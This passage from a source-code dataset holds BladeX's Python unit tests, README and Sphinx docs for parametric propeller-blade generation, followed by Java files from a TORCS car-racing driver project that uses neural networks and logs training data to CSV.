1.0, 5)\n yup = np.array([0.0, 0.75, 1.0, 0.75, 0.0])\n xdown = np.linspace(-1.0, 1.0, 5)\n ydown = np.zeros(5)\n sections = np.asarray([\n pr.CustomProfile(xup=xup, yup=yup, xdown=xdown, ydown=ydown)\n for i in range(10)\n ])\n radii = np.arange(0.4, 1.31, 0.1)\n chord_lengths = np.concatenate((np.arange(0.55, 1.1, 0.15),\n np.arange(1.03, 0.9, -0.03),\n np.array([0.3])))\n pitch = np.append(np.arange(3.0, 4., 0.2), np.arange(4.1, 3.2, -0.2))\n rake = np.append(np.arange(5e-3, 0.08, 1e-2), np.arange(0.075, 0.02, -3e-2))\n skew_angles = np.append(np.arange(-4., -9., -3.), np.arange(-7., 15., 3.))\n return bl.Blade(\n sections=sections,\n radii=radii,\n chord_lengths=chord_lengths,\n pitch=pitch,\n rake=rake,\n skew_angles=skew_angles)\n\n\nclass TestBlade(TestCase):\n \"\"\"\n Test case for the blade module.\n We first test using NACA and custom profiles then we proceed only with NACA\n to avoid WET code.\n \"\"\"\n\n def test_sections_inheritance_naca(self):\n blade = create_sample_blade_NACA()\n self.assertIsInstance(blade.sections[0], pr.NacaProfile)\n\n def test_sections_inheritance_custom(self):\n blade = create_sample_blade_custom()\n self.assertIsInstance(blade.sections[0], pr.CustomProfile)\n\n def test_sections_1_naca(self):\n blade = create_sample_blade_NACA()\n self.assertIsInstance(blade.sections, np.ndarray)\n\n def test_sections_1_custom(self):\n blade = create_sample_blade_custom()\n self.assertIsInstance(blade.sections, np.ndarray)\n\n def test_sections_2_naca(self):\n blade = create_sample_blade_NACA()\n self.assertIsInstance(blade.sections[0].xup_coordinates, np.ndarray)\n\n def test_sections_2_custom(self):\n blade = create_sample_blade_custom()\n self.assertIsInstance(blade.sections[0].xup_coordinates, np.ndarray)\n\n def test_radii_naca(self):\n blade = create_sample_blade_NACA()\n np.testing.assert_equal(blade.radii, np.arange(0.4, 1.31, 0.1))\n\n def test_radii_custom(self):\n blade = create_sample_blade_custom()\n np.testing.assert_equal(blade.radii, np.arange(0.4, 1.31, 0.1))\n\n def test_chord_naca(self):\n blade = create_sample_blade_NACA()\n np.testing.assert_equal(blade.chord_lengths,\n 
np.concatenate((np.arange(0.55, 1.1, 0.15),\n np.arange(1.03, 0.9, -0.03),\n np.array([0.3]))))\n\n def test_chord_custom(self):\n blade = create_sample_blade_custom()\n np.testing.assert_equal(blade.chord_lengths,\n np.concatenate((np.arange(0.55, 1.1, 0.15),\n np.arange(1.03, 0.9, -0.03),\n np.array([0.3]))))\n\n def test_pitch_naca(self):\n blade = create_sample_blade_NACA()\n np.testing.assert_equal(blade.pitch,\n np.append(\n np.arange(3.0, 4., 0.2),\n np.arange(4.1, 3.2, -0.2)))\n\n def test_pitch_custom(self):\n blade = create_sample_blade_custom()\n np.testing.assert_equal(blade.pitch,\n np.append(\n np.arange(3.0, 4., 0.2),\n np.arange(4.1, 3.2, -0.2)))\n\n def test_rake_naca(self):\n blade = create_sample_blade_NACA()\n np.testing.assert_equal(blade.rake,\n np.append(\n np.arange(5e-3, 0.08, 1e-2),\n np.arange(0.075, 0.02, -3e-2)))\n\n def test_rake_custom(self):\n blade = create_sample_blade_custom()\n np.testing.assert_equal(blade.rake,\n np.append(\n np.arange(5e-3, 0.08, 1e-2),\n np.arange(0.075, 0.02, -3e-2)))\n\n def test_skew_naca(self):\n blade = create_sample_blade_NACA()\n np.testing.assert_equal(blade.skew_angles,\n np.append(\n np.arange(-4., -9., -3.),\n np.arange(-7., 15., 3.)))\n\n def test_skew_custom(self):\n blade = create_sample_blade_custom()\n np.testing.assert_equal(blade.skew_angles,\n np.append(\n np.arange(-4., -9., -3.),\n np.arange(-7., 15., 3.)))\n\n def test_sections_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.sections = [pr.NacaProfile(digits='0012') for i in range(10)]\n blade._check_params()\n self.assertIsInstance(blade.sections, np.ndarray)\n\n def test_radii_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.radii = list(range(10))\n blade._check_params()\n self.assertIsInstance(blade.radii, np.ndarray)\n\n def test_chord_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.chord_lengths = list(range(10))\n blade._check_params()\n self.assertIsInstance(blade.chord_lengths, np.ndarray)\n\n def test_pitch_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.pitch = list(range(10))\n blade._check_params()\n self.assertIsInstance(blade.pitch, np.ndarray)\n\n def test_rake_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.rake = list(range(10))\n blade._check_params()\n self.assertIsInstance(blade.rake, np.ndarray)\n\n def test_skew_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.skew_angles = list(range(10))\n blade._check_params()\n self.assertIsInstance(blade.skew_angles, np.ndarray)\n\n def test_sections_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.sections = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_radii_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.radii = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_chord_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.chord_lengths = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_pitch_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.pitch = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_rake_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.rake = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_skew_array_different_length(self):\n blade = 
create_sample_blade_NACA()\n blade.skew_angles = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_compute_pitch_angle(self):\n blade = create_sample_blade_NACA()\n blade.radii[1] = 1.\n blade.pitch[1] = 2.0 * np.pi\n blade.pitch_angles = blade._compute_pitch_angle()\n assert blade.pitch_angles[1] == (np.pi / 4.0)\n\n def test_pitch_angles_array_length(self):\n blade = create_sample_blade_NACA()\n assert blade.pitch_angles.size == 10\n\n def test_induced_rake_from_skew(self):\n blade = create_sample_blade_NACA()\n blade.radii[1] = 1.\n blade.skew_angles[1] = 45.\n blade.pitch_angles[1] = np.pi / 4.\n blade.induced_rake = blade._induced_rake_from_skew()\n np.testing.assert_almost_equal(blade.induced_rake[1], np.pi / 4.)\n\n def test_induced_rake_array_length(self):\n blade = create_sample_blade_NACA()\n assert blade.induced_rake.size == 10\n\n def test_blade_coordinates_up_init(self):\n blade = create_sample_blade_NACA()\n assert len(blade.blade_coordinates_up) == 0\n\n def test_blade_coordinates_down_init(self):\n blade = create_sample_blade_NACA()\n assert len(blade.blade_coordinates_down) == 0\n\n def test_planar_to_cylindrical_blade_up(self):\n blade = create_sample_blade_NACA()\n blade._planar_to_cylindrical()\n blade_coordinates_up_expected = np.load(\n 'tests/test_datasets/planar_to_cylindrical_blade_up.npy')\n np.testing.assert_almost_equal(blade.blade_coordinates_up,\n blade_coordinates_up_expected)\n\n def test_planar_to_cylindrical_blade_down(self):\n blade = create_sample_blade_NACA()\n blade._planar_to_cylindrical()\n blade_coordinates_down_expected = np.load(\n 'tests/test_datasets/planar_to_cylindrical_blade_down.npy')\n np.testing.assert_almost_equal(blade.blade_coordinates_down,\n blade_coordinates_down_expected)\n\n def test_transformations_reflect_blade_up(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations(reflect=True)\n blade_coordinates_up_expected = np.load(\n 'tests/test_datasets/blade_up_after_transformation_reflect.npy')\n np.testing.assert_almost_equal(blade.blade_coordinates_up,\n blade_coordinates_up_expected)\n\n def test_transformations_reflect_blade_down(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations(reflect=True)\n blade_coordinates_down_expected = np.load(\n 'tests/test_datasets/blade_down_after_transformation_reflect.npy')\n np.testing.assert_almost_equal(blade.blade_coordinates_down,\n blade_coordinates_down_expected)\n\n def test_transformations_no_reflect_blade_up(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations(reflect=False)\n blade_coordinates_up_expected = np.load(\n 'tests/test_datasets/blade_up_after_transformation_no_reflect.npy')\n np.testing.assert_almost_equal(blade.blade_coordinates_up,\n blade_coordinates_up_expected)\n\n def test_transformations_no_reflect_blade_down(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations(reflect=False)\n blade_coordinates_down_expected = np.load(\n 'tests/test_datasets/blade_down_after_transformation_no_reflect.npy'\n )\n np.testing.assert_almost_equal(blade.blade_coordinates_down,\n blade_coordinates_down_expected)\n\n def test_plot(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot()\n plt.close()\n\n def test_plot_view_elev_init(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot(elev=None)\n plt.close()\n\n def test_plot_view_elev(self):\n blade = create_sample_blade_NACA()\n 
blade.apply_transformations()\n blade.plot(elev=45)\n plt.close()\n\n def test_plot_view_azim_init(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot(azim=None)\n plt.close()\n\n def test_plot_view_azim(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot(azim=-90)\n plt.close()\n\n def test_plot_save(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot(outfile='tests/test_datasets/test_plot.png')\n plt.close()\n self.assertTrue(os.path.isfile('tests/test_datasets/test_plot.png'))\n self.addCleanup(os.remove, 'tests/test_datasets/test_plot.png')\n\n def test_plot_exceptions(self):\n blade = create_sample_blade_NACA()\n with self.assertRaises(ValueError):\n blade.plot()\n\n def test_abs_to_norm_radii(self):\n blade = create_sample_blade_NACA()\n blade.radii[0] = 1.\n blade._abs_to_norm(D_prop=1.)\n assert blade.radii[0] == 2.\n\n def test_abs_to_norm_chord(self):\n blade = create_sample_blade_NACA()\n blade.chord_lengths[0] = 1.\n blade._abs_to_norm(D_prop=2.)\n assert blade.chord_lengths[0] == 0.5\n\n def test_abs_to_norm_pitch(self):\n blade = create_sample_blade_NACA()\n blade.pitch[0] = 1.\n blade._abs_to_norm(D_prop=2.)\n assert blade.pitch[0] == 0.5\n\n def test_abs_to_norm_rake(self):\n blade = create_sample_blade_NACA()\n blade.rake[0] = 1.\n blade._abs_to_norm(D_prop=2.)\n assert blade.rake[0] == 0.5\n\n def test_norm_to_abs_radii(self):\n blade = create_sample_blade_NACA()\n blade.radii[0] = 1.\n blade._norm_to_abs(D_prop=1.)\n assert blade.radii[0] == 0.5\n\n def test_norm_to_abs_chord(self):\n blade = create_sample_blade_NACA()\n blade.chord_lengths[0] = 1.5\n blade._norm_to_abs(D_prop=2.)\n assert blade.chord_lengths[0] == 3.\n\n def test_norm_to_abs_pitch(self):\n blade = create_sample_blade_NACA()\n blade.pitch[0] = 1.5\n blade._norm_to_abs(D_prop=2.)\n assert blade.pitch[0] == 3.\n\n def test_norm_to_abs_rake(self):\n blade = create_sample_blade_NACA()\n blade.rake[0] = 1.5\n blade._norm_to_abs(D_prop=2.)\n assert blade.rake[0] == 3.\n\n def test_export_ppg(self):\n blade = create_sample_blade_NACA()\n blade.export_ppg(\n filename='tests/test_datasets/data_out.ppg',\n D_prop=0.25,\n D_hub=0.075,\n n_blades=5)\n self.assertTrue(os.path.isfile('tests/test_datasets/data_out.ppg'))\n self.addCleanup(os.remove, 'tests/test_datasets/data_out.ppg')\n\n def test_blade_str_method(self):\n blade = create_sample_blade_NACA()\n string = ''\n string += 'Blade number of sections = {}'.format(blade.n_sections)\n string += '\\nBlade radii sections = {}'.format(blade.radii)\n string += '\\nChord lengths of the sectional profiles'\\\n ' = {}'.format(blade.chord_lengths)\n string += '\\nRadial distribution of the pitch (in unit lengths)'\\\n ' = {}'.format(blade.pitch)\n string += '\\nRadial distribution of the rake (in unit length)'\\\n ' = {}'.format(blade.rake)\n string += '\\nRadial distribution of the skew angles'\\\n ' (in degrees) = {}'.format(blade.skew_angles)\n string += '\\nPitch angles (in radians) for the'\\\n ' sections = {}'.format(blade.pitch_angles)\n string += '\\nInduced rake from skew (in unit length)'\\\n ' for the sections = {}'.format(blade.induced_rake)\n assert blade.__str__() == string\n" }, { "alpha_fraction": 0.7343517541885376, "alphanum_fraction": 0.7400297522544861, "avg_line_length": 47.98675537109375, "blob_id": "1918f59b611895e368f266aff654e1f4117bc6a1", "content_id": "aa2e5ecf2a710d3e7c22605cfcb677534e78a86e", "detected_licenses": [ "MIT" ], 
"is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7397, "license_type": "permissive", "max_line_length": 741, "num_lines": 151, "path": "/README.md", "repo_name": "mahgadalla/BladeX", "src_encoding": "UTF-8", "text": "**BladeX**: Python Package for Blade Deformation\n\n<p align=\"center\">\n <a href=\"http://mathlab.github.io/BladeX/\" target=\"_blank\" >\n <img alt=\"Python Package for Blade Deformation\" src=\"docs/source/_static/logo_bladex.png\" width=\"200\" />\n </a>\n</p>\n<p align=\"center\">\n <a href=\"LICENSE.rst\" target=\"_blank\">\n <img alt=\"Software License\" src=\"https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat-square\">\n </a>\n <a href=\"https://travis-ci.org/mathLab/BladeX\" target=\"_blank\">\n <img alt=\"Build Status\" src=\"https://travis-ci.org/mathLab/BladeX.svg\">\n </a>\n <a href=\"https://coveralls.io/github/mathLab/BladeX?branch=master\" target=\"_blank\">\n <img alt=\"Coverage Status\" src=\"https://coveralls.io/repos/github/mathLab/BladeX/badge.svg?branch=master\">\n </a>\n <a href=\"https://www.codacy.com/app/mathLab/BladeX?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=mathLab/BladeX&amp;utm_campaign=Badge_Grade\" target=\"_blank\">\n <img alt=\"Codacy Badge\" src=\"https://api.codacy.com/project/badge/Grade/75f02cdeed684c25a273eaffb0d89880\">\n </a>\n</p>\n\n[BladeX](http://mathlab.github.io/BladeX/) (Python Blade Deformation) is a Python package for geometrical parametrization and bottom-up construction of propeller blades. It allows to generate and deform a blade based on the radial distribution of its parameters.\n\n## Table of contents\n* [Description](#description)\n* [Dependencies and installation](#dependencies-and-installation)\n\t* [Installing from source](#installing-from-source)\n* [Documentation](#documentation)\n* [Testing](#testing)\n* [Examples](#examples)\n* [Authors and contributors](#authors-and-contributors)\n* [How to contribute](#how-to-contribute)\n\t* [Submitting a patch](#submitting-a-patch) \n* [License](#license)\n\n## Description\n**BladeX** is a Python package for geometrical parametrization and bottom-up construction of propeller blades. It allows to generate and deform a blade based on the radial distribution of its parameters such as `pitch`, `rake`, `skew`, and the sectional foils' parameters such as `chord` and `camber`. The package is ideally suited for parametric simulations on large number of blade deformations. It provides an automated procedure for the CAD generation, hence reducing the time and effort required for modelling. The main scope of BladeX is to deal with propeller blades, however it can be flexible to be applied on further applications with analogous geometrical structures such as aircraft wings, turbomachinery, or wind turbine blades.\n\nSee the [**Examples**](#examples) section below and the [**Tutorials**](tutorials/README.md) to have an idea of the potential of this package.\n\n## Dependencies and installation\n**BladeX** requires requires `numpy`, `scipy`, `matplotlib`, and `sphinx` (for the documentation). The code is compatible with Python 2.7 and Python 3.6. 
It can be installed using `pip` or directly from the source code.\n\n\n### Installing from source\nThe official distribution is on GitHub, and you can clone the repository using\n```bash\n> git clone https://github.com/mathLab/BladeX\n```\n\nTo install the package just type:\n```bash\n> python setup.py install\n```\n\nTo uninstall the package you have to rerun the installation and record the installed files in order to remove them:\n\n```bash\n> python setup.py install --record installed_files.txt\n> cat installed_files.txt | xargs rm -rf\n```\n\n## Documentation\n**BladeX** uses [Sphinx](http://www.sphinx-doc.org/en/stable/) for code documentation. You can view the documentation online [here](http://mathlab.github.io/BladeX/). To build the html version of the docs locally simply:\n\n```bash\n> cd docs\n> make html\n```\n\nThe generated html can be found in `docs/build/html`. Open up the `index.html` you find there to browse.\n\n\n## Testing\n\nWe are using Travis CI for continuous intergration testing. You can check out the current status [here](https://travis-ci.org/mathLab/BladeX).\n\nTo run tests locally:\n\n```bash\n> python test.py\n```\n\n## Examples\nYou can find useful tutorials on how to use the package in the [tutorials](tutorials/README.md) folder.\nHere we show a bottom-up parametrized construction of the [Potsdam Propeller Test Case (PPTC)](https://www.sva-potsdam.de/pptc-smp11-workshop) provided the sectional profiles as well as the radial distribution of the `pitch`, `rake`, `skew`. The blade is generated and exported to .iges and .stl formats.\n\n<p align=\"center\">\n<img src=\"readme/PPTC.png\" alt>\n</p>\n<p align=\"center\">\n<em>PPTC blade generation according to the radial distribution of the pitch, rake, skew. The generated blade is then exported to .iges and .stl formats.</em>\n</p>\n\n\n## Authors and contributors\n**BladeX** is currently developed and mantained at [SISSA mathLab](http://mathlab.sissa.it/) by\n* [Mahmoud Gadalla](mailto:[email protected])\n* [Marco Tezzele](mailto:[email protected])\n\nunder the supervision of [Dr. Andrea Mola](mailto:[email protected]) and [Prof. Gianluigi Rozza](mailto:[email protected]).\n\nContact us by email for further information or questions about **BladeX**, or suggest pull requests. Contributions improving either the code or the documentation are welcome!\n\n\n## How to contribute\nWe'd love to accept your patches and contributions to this project. There are just a few small guidelines you need to follow.\n\n### Submitting a patch\n\n 1. It's generally best to start by opening a new issue describing the bug or\n feature you're intending to fix. Even if you think it's relatively minor,\n it's helpful to know what people are working on. Mention in the initial\n issue that you are planning to work on that bug or feature so that it can\n be assigned to you.\n\n 2. Follow the normal process of [forking][] the project, and setup a new\n branch to work in. It's important that each group of changes be done in\n separate branches in order to ensure that a pull request only includes the\n commits related to that bug or feature.\n\n 3. To ensure properly formatted code, please make sure to use 4\n spaces to indent the code. The easy way is to run on your bash the provided\n script: ./code_formatter.sh. You should also run [pylint][] over your code.\n It's not strictly necessary that your code be completely \"lint-free\",\n but this will help you find common style issues.\n\n 4. 
Any significant changes should almost always be accompanied by tests. The\n project already has good test coverage, so look at some of the existing\n tests if you're unsure how to go about it. We're using [coveralls][] that\n is an invaluable tools for seeing which parts of your code aren't being\n exercised by your tests.\n\n 5. Do your best to have [well-formed commit messages][] for each change.\n This provides consistency throughout the project, and ensures that commit\n messages are able to be formatted properly by various git tools.\n\n 6. Finally, push the commits to your fork and submit a [pull request][]. Please,\n remember to rebase properly in order to maintain a clean, linear git history.\n\n[forking]: https://help.github.com/articles/fork-a-repo\n[pylint]: https://www.pylint.org/\n[coveralls]: https://coveralls.io\n[well-formed commit messages]: http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html\n[pull request]: https://help.github.com/articles/creating-a-pull-request\n\n\n## License\n\nSee the [LICENSE](LICENSE.rst) file for license rights and limitations (MIT).\n" }, { "alpha_fraction": 0.7002187967300415, "alphanum_fraction": 0.7002187967300415, "avg_line_length": 15.285714149475098, "blob_id": "20bdff24e95c529805861ce48523209d1a611458", "content_id": "fc41250cbb128960a90ba9f3c5709fe89f282627", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 457, "license_type": "permissive", "max_line_length": 31, "num_lines": 28, "path": "/docs/source/blade.rst", "repo_name": "mahgadalla/BladeX", "src_encoding": "UTF-8", "text": "Blade \n=================\n\n.. currentmodule:: bladex.blade\n\n.. automodule:: bladex.blade\n\n.. autosummary::\n\t:toctree: _summaries\n\t:nosignatures:\n\n\tBlade._abs_to_norm\n\tBlade._check_params\n\tBlade._compute_pitch_angle\n\tBlade._induced_rake_from_skew\n\tBlade._norm_to_abs\n\tBlade._planar_to_cylindrical\n\tBlade.apply_transformations\n\tBlade.plot\n\tBlade.export_ppg\n\t\n\n.. autoclass:: Blade\n\t:members:\n\t:private-members:\n\t:undoc-members:\n\t:show-inheritance:\n\t:noindex:\n\n" }, { "alpha_fraction": 0.6339017152786255, "alphanum_fraction": 0.6349047422409058, "avg_line_length": 17.811321258544922, "blob_id": "adf5cb0059ebf49d6d57bf0cdb24817b1f117afb", "content_id": "9b3740f532f35fd8880f4af4a49be6a82fdf0c7f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 997, "license_type": "permissive", "max_line_length": 117, "num_lines": 53, "path": "/docs/source/index.rst", "repo_name": "mahgadalla/BladeX", "src_encoding": "UTF-8", "text": "Welcome to BladeX's documentation!\n===================================================\n\nDescription\n^^^^^^^^^^^^\n\nBladeX is a Python package for blade generation.\n\n\nInstallation\n--------------------\nBladeX requires numpy, scipy, matplotlib, and sphinx (for the documentation). They can be easily installed via pip. \n\n\nThe `official distribution <https://github.com/mathLab/BladeX>`_ is on GitHub, and you can clone the repository using\n::\n\n git clone https://github.com/mathLab/BladeX\n\nTo install the package just type:\n::\n\n python setup.py install\n\nTo uninstall the package you have to rerun the installation and record the installed files in order to remove them:\n\n::\n\n python setup.py install --record installed_files.txt\n cat installed_files.txt | xargs rm -rf\n\n\n\n\nDeveloper's Guide\n--------------------\n\n.. 
toctree::\n :maxdepth: 1\n\n code\n contact\n contributing\n LICENSE\n\n\n\nIndices and tables\n^^^^^^^^^^^^^^^^^^^^^^^^\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n" } ]
4
wbwvos/torcsproject2015
https://github.com/wbwvos/torcsproject2015
b67a2ddb42aeab002303ef83547f4239fa638716
dcdfff125e41c4820377f59bc09b81202fb4117c
a09737590fded40ee13c60d164e2fd13f762b1c8
refs/heads/master
2021-01-10T01:37:27.525467
2015-12-01T13:03:49
2015-12-01T13:03:49
46,572,009
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6047101616859436, "alphanum_fraction": 0.6105072498321533, "avg_line_length": 23.42477798461914, "blob_id": "27b33f5dfde5dc911c0c49250c666290a7c907d7", "content_id": "a9c304997af7ebd46d05c0767a1cc857e7f3152a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2760, "license_type": "no_license", "max_line_length": 72, "num_lines": 113, "path": "/src/trainingdatawriter.java", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "import java.io.FileWriter;\nimport java.io.IOException;\n\nimport cicontest.torcs.client.Action;\nimport cicontest.torcs.client.SensorModel;\n\npublic class trainingdatawriter {\n\t\n\tpublic FileWriter writer;\n\n\tpublic trainingdatawriter(String filename){\n\t\ttry {\n\t\t\twriter = new FileWriter(filename);\n\t\t} catch (IOException e) {\n\t\t\tSystem.out.print(\"failed to write csv\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\t\n\t\tinitializeCsvFile();\n\t}\n\t\n\tpublic void initializeCsvFile(){\n\t\ttry{\n\t\t\twriter.append(\"Speed\");\n\t\t writer.append(',');\n\t\t writer.append(\"AngleToTrackAxis\");\n\t\t writer.append(',');\n\t\t writer.append(\"DistanceFromStartLine\");\n\t\t writer.append(',');\n\t\t writer.append(\"TrackEdgeSensors\");\n\t\t writer.append(',');\n\t\t writer.append(\"FocusSensors\");\n\t\t writer.append(',');\n\t\t writer.append(\"TrackPosition\");\n\t\t writer.append(',');\n\t\t \n\t\t writer.append(\"accelerate\");\n\t\t writer.append(',');\n\t\t writer.append(\"brake\");\n\t\t writer.append(',');\n\t\t writer.append(\"steering\");\n\t\t writer.append(',');\n\t\t \n\t\t writer.append(\"\\n\");\n\t\t \n\t\t}\n\t\tcatch(IOException e)\n\t\t{\n\t\t\tSystem.out.print(\"could not initialize csv\");\n\t\t e.printStackTrace();\n\t\t} \n\t}\n\tpublic void appendtoCsvFile(SensorModel sensors, Action action)\n\t {\n\t\t\n\t\tString[] datastring = new String[6];\n \tString[] actionstring= new String[3];\n \tdatastring[0] = String.valueOf(sensors.getSpeed());\n \tdatastring[1] = String.valueOf(sensors.getAngleToTrackAxis());\n \tdatastring[2] = String.valueOf(sensors.getDistanceFromStartLine());\n\n \tdatastring[3] = extractvalues(sensors.getTrackEdgeSensors());\n \tdatastring[4] = extractvalues(sensors.getFocusSensors());\n \t\n \tdatastring[5] = String.valueOf(sensors.getTrackPosition());\n\n \tactionstring[0] = String.valueOf(action.accelerate);\n \tactionstring[1] = String.valueOf(action.brake);\n \tactionstring[2] = String.valueOf(action.steering);\n \t\n\t\t\ttry\n\t\t\t{\n\t\t\t \n\t\t\t\tfor(int i=0; i< datastring.length; i++){\n\t\t\t\t\twriter.append(datastring[i]);\n\t\t\t\t writer.append(',');\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tfor(int i=0; i< actionstring.length; i++){\n\t\t\t\t\twriter.append(actionstring[i]);\n\t\t\t\t writer.append(',');\n\t\t\t\t}\n\t\t\t\t\n\t\t\t writer.append('\\n');\n\t\t\t\t\t\n\t\t\t //generate whatever data you want\n\t\t\t\t\t\n\t\t\t writer.flush();\n\t\t\t //writer.close();\n\t\t\t}\n\t\t\tcatch(IOException e)\n\t\t\t{\n\t\t\t\tSystem.out.print(\"could not append to csv\");\n\t\t\t e.printStackTrace();\n\t\t\t} \n\t \n\t}\n\t\n\tpublic String extractvalues(double[] array){\n \tint length = array.length;\n \t\n \tString result = \"\";\n \tif (length == 0) {\n \t\treturn result;\n \t}\n \tresult += String.valueOf(array[0]);\n \tfor(int i=1;i<length; i++){\n \t\tresult += \",\" + String.valueOf(array[i]);\t\n \t}\n \treturn result;\n }\n\t\n}\n" }, { "alpha_fraction": 0.6508147120475769, "alphanum_fraction": 
0.6636983752250671, "avg_line_length": 30.23668670654297, "blob_id": "b209d0cab45b1ddbd57fe38c4f77cf636c793eba", "content_id": "ec7ca7e69988cd926beade3e51419462d4e21ba4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5278, "license_type": "no_license", "max_line_length": 107, "num_lines": 169, "path": "/src/DefaultDriver.java", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "import cicontest.algorithm.abstracts.AbstractDriver;\nimport cicontest.torcs.client.Action;\nimport cicontest.torcs.client.SensorModel;\nimport cicontest.torcs.genome.IGenome;\n//import trainNeuralNetwork.NeuralNetwork;\nimport trainNeuralNetwork.NeuralNetwork;\n\npublic class DefaultDriver extends AbstractDriver {\n\t\n//\ttrainingdatawriter datawriter = new trainingdatawriter(\"Self generated training data/trainingdata.csv\");\n\n private NeuralNetwork MyNN;\n private NeuralNetwork speedNN;\n private NeuralNetwork positionNN;\n private NeuralNetwork NeatNN;\n private double targetSpeed;\n private double targetPosition;\n \n @Override\n public void control(Action action, SensorModel sensors) {\n \tthis.directControl(action, sensors);\n// \tthis.indirectControl(action, sensors);\n// \tthis.NEATControl(action, sensors);\n }\n \n @Override\n\tpublic void loadGenome(IGenome genome) {\n \tif (genome instanceof DefaultDriverGenome) {\n \t\tDefaultDriverGenome MyGenome = (DefaultDriverGenome) genome;\n \t\tMyNN = MyGenome.getMyNN();\n \t\tthis.speedNN = MyGenome.getSpeedNN();\n \t\tthis.positionNN = MyGenome.getPositionNN();\n \t\tthis.NeatNN = MyGenome.getNeatNN();\n \t} else {\n \t\tSystem.err.println(\"Invalid Genome assigned\");\n \t}\n }\n\n private double[] getValues(SensorModel sensors){ \n \treturn MyNN.useNN(sensors);\n }\n \n private double[] getNEATValues(SensorModel sensors){ \n \treturn NeatNN.useNN(sensors);\n }\n \n public String getDriverName() {\n return \"simple example\";\n }\n \n \n \n public void controlQualification(Action action, SensorModel sensors) {\n action.clutch = 1;\n action.steering = Math.random() * (1 - -1) -1;\n action.accelerate = 1;\n action.brake = 0;\n //super.controlQualification(action, sensors);\n }\n \n public void controlRace(Action action, SensorModel sensors) {\n action.clutch = 1;\n action.steering = Math.random() * (1 - -1) -1;\n action.accelerate = 1;\n action.brake = 0;\n //super.ControlRace(action, sensors);\n }\n \n public void defaultControl(Action action, SensorModel sensors){\n action.clutch = 1;\n action.steering = Math.random() * (1 - -1) -1;\n action.accelerate = 1;\n action.brake = 0;\n //super.defaultControl(action, sensors);\n }\n \n \n\t@Override\n\tpublic double getAcceleration(SensorModel sensors) {\n\t\tdouble acceleration = 0;\n\t\tdouble speedDiff = this.targetSpeed - sensors.getSpeed();\n\t\tif (speedDiff > 20) {\n\t\t\tacceleration = 1;\n\t\t} else if (speedDiff > 0) {\n\t\t\tacceleration = speedDiff / 20;\n\t\t}\n\t\treturn acceleration > 1 ? 1 : acceleration;\n\t}\n\t\n\tpublic double getBrake(SensorModel sensors) {\n\t\tdouble brake = 0;\n\t\tdouble speedDiff = this.targetSpeed - sensors.getSpeed();\n\t\tif (speedDiff < -20) {\n\t\t\tbrake = 1;\n\t\t} else if (speedDiff < 0) {\n\t\t\tbrake = - speedDiff / 20;\n\t\t}\n\t\treturn brake < -1 ? 
-1 : brake;\n\t}\n\n\t@Override\n\tpublic double getSteering(SensorModel sensors) {\n\t\tdouble steeringReactiveness = 20;\n\t\tdouble steerLock = 2;\n\t double angle = sensors.getAngleToTrackAxis();\n\t\tdouble positionDiff = this.targetPosition - sensors.getTrackPosition();\n\t\tangle += positionDiff * steeringReactiveness;\n\t\tdouble steering = angle/steerLock;\n\t\tif (steering < -1) { \n\t\t\treturn -1;\n\t\t}\n\t\tif (steering > 1) {\n\t\t\treturn 1;\n\t\t}\n\t\treturn steering;\n\t}\n\t\n\tprivate void directControl(Action action, SensorModel sensors) {\n\t\tdouble[] values = getValues(sensors);\n\n\t\tboolean smooth = Math.abs(values[2]) < 0.15;\n \taction.accelerate = smooth && (0.4 > values[0]) ? 0.4 : values[0];\n \taction.brake = 0;\n \taction.steering = smooth ? 0 : values[2];\n \t\n \tSystem.out.print(action.accelerate + \" \");\n// \tSystem.out.print(action.brake + \" \" );\n \tSystem.out.print(values[1] + \" \" );\n \tSystem.out.print(action.steering +\"\\n\");\n\t}\n\t\n\tprivate void NEATControl(Action action, SensorModel sensors) {\n\t\tdouble[] values = getNEATValues(sensors);\n\n \tif(values[1] > values[0]){\n\t\t\taction.accelerate = values[0];\n \t}else{\n \taction.brake = 